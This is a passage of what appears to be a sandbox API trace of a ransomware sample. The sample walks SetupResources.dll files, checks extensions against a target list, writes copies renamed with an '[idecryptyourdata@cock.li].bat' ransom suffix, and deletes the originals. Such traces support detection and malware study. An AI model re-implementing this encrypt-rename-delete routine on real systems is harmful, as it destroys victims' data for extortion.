(lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.054] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1035\\setupresources.dll")) returned 1 [0047.055] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.055] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.055] lstrlenW (lpString=".doc") returned 4 [0047.055] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.055] lstrlenW (lpString=".docx") returned 5 [0047.055] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.055] lstrlenW (lpString=".pdf") returned 4 [0047.055] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.055] lstrlenW (lpString=".xls") returned 4 [0047.055] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.055] lstrlenW (lpString=".xlsx") returned 5 [0047.055] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.055] lstrlenW (lpString=".ppt") returned 4 [0047.055] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.055] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.055] lstrlenW (lpString=".zip") returned 4 [0047.055] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.055] lstrlenW (lpString=".rar") returned 4 [0047.055] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.055] lstrlenW (lpString=".bz2") returned 4 [0047.055] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.055] lstrlenW (lpString=".7z") returned 3 [0047.055] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.056] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.056] lstrlenW (lpString=".dbf") returned 4 [0047.056] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.056] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.056] lstrlenW (lpString=".1cd") returned 4 [0047.056] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.056] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.056] lstrlenW (lpString=".jpg") returned 4 [0047.056] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.056] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.056] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.056] lstrlenW (lpString=".doc") returned 4 [0047.056] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.056] lstrlenW (lpString=".docx") returned 5 [0047.056] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.056] lstrlenW (lpString=".pdf") returned 4 [0047.056] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.056] lstrlenW (lpString=".xls") returned 4 [0047.056] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.056] lstrlenW (lpString=".xlsx") returned 5 [0047.056] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.056] lstrlenW (lpString=".ppt") returned 4 [0047.056] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.056] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.056] lstrlenW (lpString=".zip") returned 4 [0047.056] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.056] lstrlenW (lpString=".rar") returned 4 [0047.056] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.056] lstrlenW (lpString=".bz2") returned 4 [0047.057] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.057] lstrlenW (lpString=".7z") returned 3 [0047.057] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.057] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.057] lstrlenW (lpString=".dbf") returned 4 [0047.057] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.057] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.057] lstrlenW (lpString=".1cd") returned 4 [0047.057] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.057] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned 45 [0047.057] lstrlenW (lpString=".jpg") returned 4 [0047.057] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.057] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0047.057] lstrlenW (lpString="SetupResources.dll") returned 18 [0047.057] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.058] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=18264) returned 1 [0047.058] CloseHandle (hObject=0x2d4) returned 1 [0047.058] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 0x80 [0047.058] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.058] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.058] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.058] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.058] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.061] GetLastError () returned 0x0 [0047.061] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x4758, lpOverlapped=0x0) returned 1 [0047.063] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x4760, lpOverlapped=0x0) returned 1 [0047.064] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.064] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.064] SetEndOfFile (hFile=0x2dc) returned 1 [0047.064] CloseHandle (hObject=0x2dc) returned 1 [0047.065] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.065] SetEndOfFile (hFile=0x2d4) returned 1 [0047.066] CloseHandle (hObject=0x2d4) returned 1 [0047.067] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.067] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1049\\setupresources.dll")) returned 1 [0047.067] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.067] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.067] lstrlenW (lpString=".doc") returned 4 [0047.067] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.067] lstrlenW (lpString=".docx") returned 5 [0047.067] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.067] lstrlenW (lpString=".pdf") returned 4 [0047.067] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.067] lstrlenW (lpString=".xls") returned 4 [0047.067] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.067] lstrlenW (lpString=".xlsx") returned 5 [0047.068] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.068] lstrlenW (lpString=".ppt") returned 4 [0047.068] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.068] lstrlenW (lpString=".zip") returned 4 [0047.068] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.068] lstrlenW (lpString=".rar") returned 4 [0047.068] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.068] lstrlenW (lpString=".bz2") returned 4 [0047.068] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.068] lstrlenW (lpString=".7z") returned 3 [0047.068] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.068] lstrlenW (lpString=".dbf") returned 4 [0047.068] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.068] lstrlenW (lpString=".1cd") returned 4 [0047.068] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.068] lstrlenW (lpString=".jpg") returned 4 [0047.068] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.068] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.068] lstrlenW (lpString=".doc") returned 4 [0047.068] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.068] lstrlenW (lpString=".docx") returned 5 [0047.068] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.068] lstrlenW (lpString=".pdf") returned 4 [0047.068] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.069] lstrlenW (lpString=".xls") returned 4 [0047.069] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.069] lstrlenW (lpString=".xlsx") returned 5 [0047.069] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.069] lstrlenW (lpString=".ppt") returned 4 [0047.069] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.069] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.069] lstrlenW (lpString=".zip") returned 4 [0047.069] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.069] lstrlenW (lpString=".rar") returned 4 [0047.069] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.069] lstrlenW (lpString=".bz2") returned 4 [0047.069] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.069] lstrlenW (lpString=".7z") returned 3 [0047.069] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.069] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.069] lstrlenW (lpString=".dbf") returned 4 [0047.069] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.069] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.069] lstrlenW (lpString=".1cd") returned 4 [0047.069] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.069] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\SetupResources.dll") returned 45 [0047.069] lstrlenW (lpString=".jpg") returned 4 [0047.069] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.069] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0047.070] lstrlenW (lpString="SetupResources.dll") returned 18 [0047.070] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.070] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=17752) returned 1 [0047.070] CloseHandle (hObject=0x2d4) returned 1 [0047.070] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 0x80 [0047.070] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.070] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.070] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.070] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.070] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.073] GetLastError () returned 0x0 [0047.073] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x4558, lpOverlapped=0x0) returned 1 [0047.075] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x4560, lpOverlapped=0x0) returned 1 [0047.076] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.076] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.077] SetEndOfFile (hFile=0x2dc) returned 1 [0047.077] CloseHandle (hObject=0x2dc) returned 1 [0047.078] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.078] SetEndOfFile (hFile=0x2d4) returned 1 [0047.079] CloseHandle (hObject=0x2d4) returned 1 [0047.079] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.079] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 1 [0047.079] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.079] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.079] lstrlenW (lpString=".doc") returned 4 [0047.079] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.079] lstrlenW (lpString=".docx") returned 5 [0047.079] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.079] lstrlenW (lpString=".pdf") returned 4 [0047.079] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.079] lstrlenW (lpString=".xls") returned 4 [0047.080] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.080] lstrlenW (lpString=".xlsx") returned 5 [0047.080] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.080] lstrlenW (lpString=".ppt") returned 4 [0047.080] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.080] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.080] lstrlenW (lpString=".zip") returned 4 [0047.080] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.080] lstrlenW (lpString=".rar") returned 4 [0047.080] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.080] lstrlenW (lpString=".bz2") returned 4 [0047.080] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.080] lstrlenW (lpString=".7z") returned 3 [0047.080] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.080] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.080] lstrlenW (lpString=".dbf") returned 4 [0047.080] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.080] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.080] lstrlenW (lpString=".1cd") returned 4 [0047.080] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.080] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.080] lstrlenW (lpString=".jpg") returned 4 [0047.080] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.080] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.080] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.080] lstrlenW (lpString=".doc") returned 4 [0047.080] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.080] lstrlenW (lpString=".docx") returned 5 [0047.081] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.081] lstrlenW (lpString=".pdf") returned 4 [0047.081] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.081] lstrlenW (lpString=".xls") returned 4 [0047.081] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.081] lstrlenW (lpString=".xlsx") returned 5 [0047.081] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.081] lstrlenW (lpString=".ppt") returned 4 [0047.081] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.081] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.081] lstrlenW (lpString=".zip") returned 4 [0047.081] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.081] lstrlenW (lpString=".rar") returned 4 [0047.081] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.081] lstrlenW (lpString=".bz2") returned 4 [0047.081] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.081] lstrlenW (lpString=".7z") returned 3 [0047.081] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.081] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.081] lstrlenW (lpString=".dbf") returned 4 [0047.081] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.081] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.081] lstrlenW (lpString=".1cd") returned 4 [0047.081] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.081] lstrlenW (lpString="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 45 [0047.081] lstrlenW (lpString=".jpg") returned 4 [0047.081] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.082] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0047.082] lstrlenW (lpString="SetupResources.dll") returned 18 [0047.082] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.082] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=17752) returned 1 [0047.082] CloseHandle (hObject=0x2d4) returned 1 [0047.082] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 0x80 [0047.082] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.082] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0047.082] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.082] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.082] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.084] GetLastError () returned 0x0 [0047.084] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x4558, lpOverlapped=0x0) returned 1 [0047.659] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x4560, lpOverlapped=0x0) returned 1 [0047.661] ReadFile (in: hFile=0x2d4, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.661] WriteFile (in: hFile=0x2dc, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf8, lpOverlapped=0x0) returned 1 [0047.661] SetEndOfFile (hFile=0x2dc) returned 1 [0047.661] CloseHandle (hObject=0x2dc) returned 1 [0047.662] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.662] SetEndOfFile (hFile=0x2d4) returned 1 [0047.663] CloseHandle (hObject=0x2d4) returned 1 [0047.663] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.664] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 1 [0047.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.664] lstrlenW (lpString=".doc") returned 4 [0047.664] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.664] lstrlenW (lpString=".docx") returned 5 [0047.664] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0047.664] lstrlenW (lpString=".pdf") returned 4 [0047.664] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.664] lstrlenW (lpString=".xls") returned 4 [0047.664] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.664] lstrlenW (lpString=".xlsx") returned 5 [0047.664] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0047.664] lstrlenW (lpString=".ppt") returned 4 [0047.664] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.664] lstrlenW (lpString=".zip") returned 4 [0047.664] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.664] lstrlenW (lpString=".rar") returned 4 [0047.664] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.664] lstrlenW (lpString=".bz2") returned 4 [0047.665] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.665] lstrlenW (lpString=".7z") returned 3 [0047.665] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.665] lstrlenW (lpString=".dbf") returned 4 [0047.665] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.665] lstrlenW (lpString=".1cd") returned 4 [0047.665] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.665] lstrlenW (lpString=".jpg") returned 4 [0047.665] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0047.665] lstrlenW 